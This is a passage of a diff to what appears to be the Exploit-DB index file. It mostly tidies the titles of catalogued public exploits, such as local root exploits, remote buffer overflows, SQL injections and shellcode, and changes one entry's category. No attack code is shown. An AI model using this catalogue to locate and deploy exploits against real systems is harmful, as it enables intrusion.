+19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0
 19897,platforms/windows/remote/19897.txt,"FrontPage 2000_IIS 4.0/5.0 Server Extensions Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0
 19898,platforms/php/webapps/19898.txt,"Forum Oxalis <= 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
@@ -18039,7 +18039,7 @@ id,file,description,date,author,platform,type,port
 20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,windows,dos,0
 20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps,0
 20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0
-20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
+20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0
 20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0
@@ -18641,7 +18641,7 @@ id,file,description,date,author,platform,type,port
 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0
 21362,platforms/linux/local/21362.c,"Oracle 8i TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0
 21363,platforms/unix/remote/21363.c,"Icecast 1.x AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0
-21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
+21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
 21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0
 21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6_Outlook 2000/2002/5.5_Word 2000/2002 VBScript ActiveX Word Object DoS",2002-04-08,"Elia Florio",windows,dos,0
 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0
@@ -18943,7 +18943,7 @@ id,file,description,date,author,platform,type,port
 21666,platforms/linux/local/21666.txt,"soapbox <= 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0
 21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",linux,local,0
 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection",2002-07-29,delusion,php,webapps,0
-21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
+21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
 21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0
 21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)",2002-07-30,spabam,unix,remote,0
@@ -20079,7 +20079,7 @@ id,file,description,date,author,platform,type,port
 22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
 22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0
 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0
-22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - execve() System Call Race Condition PoC",2003-06-26,IhaQueR,linux,local,0
+22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - suid execve() System Call Race Condition PoC",2003-06-26,IhaQueR,linux,local,0
 22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.php File Deletion",2003-06-26,leseulfrog,php,webapps,0
 22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0
 22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0
@@ -22427,7 +22427,7 @@ id,file,description,date,author,platform,type,port
 25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0
 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0
 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include",2005-03-26,Dcrab,php,webapps,0
-25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)",2005-03-28,"ilja van sprundel",linux,local,0
+25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)",2005-03-28,"ilja van sprundel",linux,local,0
 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)",2005-04-08,qobaiashi,linux,local,0
 25289,platforms/linux/local/25289.c,"Linux Kernel <= 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0
 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0
@@ -23275,7 +23275,7 @@ id,file,description,date,author,platform,type,port
 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0
 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
-26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
+26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0
 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,Metasploit,windows,remote,0
@@ -26233,7 +26233,7 @@ id,file,description,date,author,platform,type,port
 29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
 29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under Polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x Register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0
-29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
+29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.php IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0
 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0
 29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0
@@ -30064,7 +30064,7 @@ id,file,description,date,author,platform,type,port
 33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0
 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
-33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
+33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
 33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
 33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting",2009-11-02,blake,php,webapps,0
 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x (2.6.0 <= 2.6.31) - 'pipe.c' Local Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
@@ -30218,7 +30218,7 @@ id,file,description,date,author,platform,type,port
 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0
 33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0
 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
-33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
+33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
 33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
 33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0
 33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
@@ -31418,7 +31418,7 @@ id,file,description,date,author,platform,type,port
 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0
 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0
 34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0
-34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0
+34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0
 34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0
 34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0
@@ -31618,7 +31618,7 @@ id,file,description,date,author,platform,type,port
 35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0
 35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
-35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
+35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
 35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
 35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 - 'com_redirect' Local File Include",2010-12-13,jos_ali_joe,php,webapps,0
 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
@@ -31867,7 +31867,7 @@ id,file,description,date,author,platform,type,port
 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0
 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS",2014-11-25,"Halil Dalabasmaz",php,webapps,80
 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0
-35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root",2014-11-25,"Kaiqu Chen",linux,local,0
+35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0
 35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80
 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80
 35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0
@@ -32384,7 +32384,7 @@ id,file,description,date,author,platform,type,port
 35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0
-35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
+35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0
 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0
 35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include",2011-07-05,FL0RiX,php,webapps,0
@@ -32397,7 +32397,7 @@ id,file,description,date,author,platform,type,port
 35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
 35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross Site Scripting",2011-07-11,Zerial,php,webapps,0
 35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0
-35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias.",hardware,remote,0
+35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0
 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0
 35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass",2015-01-29,"Amplia Security Research",osx,local,0
 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
@@ -32420,7 +32420,7 @@ id,file,description,date,author,platform,type,port
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
-35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,local,0
+35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,dos,0
 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
@@ -33104,7 +33104,7 @@ id,file,description,date,author,platform,type,port
 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit",2015-04-09,xort,linux,remote,8000
 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80
-36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
+36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0
 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0
 36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting",2012-02-13,sonyy,php,webapps,0
@@ -34349,7 +34349,7 @@ id,file,description,date,author,platform,type,port
 38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0
 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
-38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,Metasploit,osx,local,0
+38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0
 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0
 38038,platforms/multiple/dos/38038.txt,"Splunk <= 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0
 38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Include",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
@@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
 38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0
 38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0
 38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0
-38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
+38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
 38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80
 38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal",2015-09-02,HaHwul,php,webapps,80
 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
@@ -34402,7 +34402,7 @@ id,file,description,date,author,platform,type,port
 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include",2012-12-30,Amirh03in,php,webapps,0
 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0
-38136,platforms/osx/local/38136.txt,"OS X Install.framework suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
+38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0
 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
@@ -34735,7 +34735,7 @@ id,file,description,date,author,platform,type,port
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
-38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
+38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
 38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0
 38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0
@@ -35896,7 +35896,7 @@ id,file,description,date,author,platform,type,port
 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
 39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
-39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
+39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
 39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
@@ -35979,7 +35979,7 @@ id,file,description,date,author,platform,type,port
 39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
 39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
 39771,platforms/linux/dos/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)",2016-05-04,"Google Security Research",linux,dos,0
-39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
+39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
 39773,platforms/linux/dos/39773.txt,"Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",linux,dos,0
 39774,platforms/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos,0
